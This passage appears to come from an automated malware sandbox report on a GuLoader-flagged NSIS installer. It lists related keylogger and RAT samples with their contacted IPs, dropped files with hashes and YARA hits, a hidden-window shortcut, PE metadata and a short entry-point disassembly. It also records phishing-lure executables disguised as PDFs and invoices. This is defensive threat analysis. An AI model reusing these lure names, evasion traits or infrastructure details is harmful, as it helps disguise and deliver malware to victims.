                                                                                                • 158.101.44.242
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 158.101.44.242
                                                                                                dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 193.122.130.0
                                                                                                fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                TELEGRAMRU14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 149.154.167.220
                                                                                                YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                CLOUDFLARENETUS14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 104.21.32.1
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 104.21.64.1
                                                                                                fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                                                                • 104.21.112.1
                                                                                                JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 172.67.74.152
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.32.1
                                                                                                962Zrwh5bU.exeGet hashmaliciousAzorultBrowse
                                                                                                • 104.21.75.48
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.64.1
                                                                                                3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.16.1
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.112.1
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.112.1
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                54328bd36c14bd82ddaa0c04b25ed9ad14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                3b5074b1b5d032e5620f69f9f700ff0e14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 149.154.167.220
                                                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                ZFCKpFXpzx.exeGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 149.154.167.220
                                                                                                37f463bf4616ecd445d4a1937da06e1914lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                AM983ebb5F.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                av8XPPpdBc.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 142.250.181.238
                                                                                                • 142.250.185.225
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):84676
                                                                                                                    Entropy (8bit):4.593537883547379
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:aadyq9kO2bRTYBX+RzIhnAdETUJRJFqIpvhdGprfP:XiRT649EQJRPjpg3
                                                                                                                    MD5:8159A2D86C670494AFC0ADB78B7C8D96
                                                                                                                    SHA1:C435997868D551D974292AEE95148A57D74187EE
                                                                                                                    SHA-256:E22226452363F45A87DC3B3D70EBC85BDF0B9CF806195E2D2B3477FD0D9CC19A
                                                                                                                    SHA-512:7533001251FA85D6CB0A2BD0E6711899649E77B59B9A4BD50763D1205B570BAF952F46218F503377C30F0F206E8635E4A9DEB51F3F4BC6883B798C40271E3322
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:......................H.H.../.R.......ii.................%......2...a......................J....5.dd.'''....w......oo................v..........XX..//.%%%.aa................3..........s.)...W.......=...........................................................b.D...........''.........T.............HHH........>>>>..L............T.44...1........................l.............................r.......AAA............................W.....ZZ.........^^.22.U.A..dd..rr....................T...$..........7.L..4.........h.........8...................F.o.uu............V...aa......hh............p...............................P..................N......h.....................999....222.j..IIII...........}}}}}}..........................................N.............]....zzz..````.....k.....2222.6..n...............<<.88..........6.`...............**........................11................F.\\\\......X......ll.kkk..........,............k...@.--......CC...........8888......................K..........-..V.
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:Matlab v4 mat-file (little endian) \231, numeric, rows 2627469422, columns 4278190236, imaginary
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):289886
                                                                                                                    Entropy (8bit):7.719204939905373
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:7J+RkeB2X2w2mTIfT6sIDELqCEKD9CmfsDI4fYKnBIFuG:iTBBZ4ls+C/Eg9CwWB9G
                                                                                                                    MD5:866D60CB22182941AA52F507E4BB366D
                                                                                                                    SHA1:DC7A87E547D91E96EAE27603BD294E77F9FF65F8
                                                                                                                    SHA-256:CA037EB9952D7A6042B2DC32231AC5FF9B78D6B5D4F56522B882C0BE721B5FD0
                                                                                                                    SHA-512:A8E8A93B1C73B7B49551CAC78E418B56EE730B3BD2E1AD4EF05427C8FD9955E7193E7D0CAD3224935CFA995E3C25AC55A753B847FC711FF7661A11EF02A98D69
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.Nub, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Preview:....n..........c........]]]]]..C...........................Z................]]]..............)......``../..................==.00...............-...2.8....R...........e.......\.............................JJJJ.............]]]]].................R.....ZZ.((..........................0.........1..............FF...................................H.............$$.hhhhh...'.9..................0.>.....................!.lll.....................W.n..........~.......FFF../.........444..f................44.Y.............RRR..............ll..=.....!.333.......`.....}.....................NNNN..77..........!!...........................t..................U.V...............{{..$.#....z...........E.........??.iiiii........11........=.\.55.MM........I.....h..............^......................................HHH....................................\.www..n......U..,,,..]............;;.6..w...vvv..........HHHHHH................m..........................GG..........f..CC.................................,...
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):56641
                                                                                                                    Entropy (8bit):1.2318917163845036
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                                    MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                                    SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                                    SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                                    SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):345
                                                                                                                    Entropy (8bit):4.241929841155785
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                                    MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                                    SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                                    SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                                    SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):210366
                                                                                                                    Entropy (8bit):1.240975322465592
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                                    MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                                    SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                                    SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                                    SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):363811
                                                                                                                    Entropy (8bit):1.2512349423386382
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                                    MD5:BFEA15C03AB295424981A73637A19491
                                                                                                                    SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                                    SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                                    SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):11776
                                                                                                                    Entropy (8bit):5.655335921632966
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                                    MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                                    SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                                    SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                                    SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: 14lVOjBoI2.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Qg79mitNvD.exe, Detection: malicious, Browse
                                                                                                                    • Filename: FILHKLtCw0.exe, Detection: malicious, Browse
                                                                                                                    • Filename: ppISxhDcpF.exe, Detection: malicious, Browse
                                                                                                                    • Filename: m0CZ8H4jfl.exe, Detection: malicious, Browse
                                                                                                                    • Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe, Detection: malicious, Browse
                                                                                                                    • Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, Detection: malicious, Browse
                                                                                                                    • Filename: PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                                    • Filename: RFQ December-January Forcast and TCL.exe, Detection: malicious, Browse
                                                                                                                    • Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1178
                                                                                                                    Entropy (8bit):3.263725083680734
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DEDIRKQ1olfW+kjcmAa9IwRi:8xLDWLrFPjPM9izZMFypdqy
                                                                                                                    MD5:988DEB0B4D8854FE2B6E9AC87B901082
                                                                                                                    SHA1:EB7EF5DDDEAF071D71957F90489E2854D1FD65E3
                                                                                                                    SHA-256:4365D73D86F0DA595081D7A2E319EC8205E91B2FBEFD3AE5231071601A0FF404
                                                                                                                    SHA-512:2AC8E0B4647C10EC1D61F48F67CCC03849E6111C307F3429F520B4F8D386F3BFA4E264C41093F92247F0577E26E747885B7B321CF34F2113306F103965908B0A
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.Z.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.V.i.l.k.a.a.r.e.t.s.............y..........
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                    Entropy (8bit):7.962303183160449
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:grrezORe7h.exe
                                                                                                                    File size:465'972 bytes
                                                                                                                    MD5:fd7d65a4a49c3867970510443c8819d5
                                                                                                                    SHA1:088fa33f1e46a544ddec2d2493895abbf358b1d3
                                                                                                                    SHA256:ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f
                                                                                                                    SHA512:39722036948fd74e97f6586122d86e2c7a4d16716fdd15020b73848345bcb5b3b75e1f956589fe4f6c4abfd658c20a712563b10abb701bfab06c8d417b0a0aec
                                                                                                                    SSDEEP:12288:I5Az4Ci9QbB5i3M5vmdmKEBmnSXu7Jj1JK8s5FEeKB:ZAiK3cvmPEBmnSXu7Jj1JiceI
                                                                                                                    TLSH:C3A4230091A0C103D1B316340C755AFA7B3AA705EBA87F1BD79C3E5E7D31A92D82E9D9
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                                    Icon Hash:3d2e0f95332b3399
                                                                                                                    Entrypoint:0x4032a0
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                                    Instruction
                                                                                                                    sub esp, 000002D4h
                                                                                                                    push ebp
                                                                                                                    push esi
                                                                                                                    push 00000020h
                                                                                                                    xor ebp, ebp
                                                                                                                    pop esi
                                                                                                                    mov dword ptr [esp+0Ch], ebp
                                                                                                                    push 00008001h
                                                                                                                    mov dword ptr [esp+0Ch], 0040A300h
                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                    call dword ptr [004080B0h]
                                                                                                                    call dword ptr [004080ACh]
                                                                                                                    cmp ax, 00000006h
                                                                                                                    je 00007F676566B7D3h
                                                                                                                    push ebp
                                                                                                                    call 00007F676566E916h
                                                                                                                    cmp eax, ebp
                                                                                                                    je 00007F676566B7C9h
                                                                                                                    push 00000C00h
                                                                                                                    call eax
                                                                                                                    push ebx
                                                                                                                    push edi
                                                                                                                    push 0040A2F4h
                                                                                                                    call 00007F676566E893h
                                                                                                                    push 0040A2ECh
                                                                                                                    call 00007F676566E889h
                                                                                                                    push 0040A2E0h
                                                                                                                    call 00007F676566E87Fh
                                                                                                                    push 00000009h
                                                                                                                    call 00007F676566E8E4h
                                                                                                                    push 00000007h
                                                                                                                    call 00007F676566E8DDh
                                                                                                                    mov dword ptr [00434F04h], eax
                                                                                                                    call dword ptr [00408044h]
                                                                                                                    push ebp
                                                                                                                    call dword ptr [004082A8h]
                                                                                                                    mov dword ptr [00434FB8h], eax
                                                                                                                    push ebp
                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                    push 000002B4h
                                                                                                                    push eax
                                                                                                                    push ebp
                                                                                                                    push 0042B228h
                                                                                                                    call dword ptr [0040818Ch]
                                                                                                                    push 0040A2C8h
                                                                                                                    push 00433F00h
                                                                                                                    call 00007F676566E4CAh
                                                                                                                    call dword ptr [004080A8h]
                                                                                                                    mov ebx, 0043F000h
                                                                                                                    push eax
                                                                                                                    push ebx
                                                                                                                    call 00007F676566E4B8h
                                                                                                                    push ebp
                                                                                                                    call dword ptr [00408178h]
                                                                                                                    Programming Language:
                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                    RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                    RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                                    RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                                    RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                                    RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                                    RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
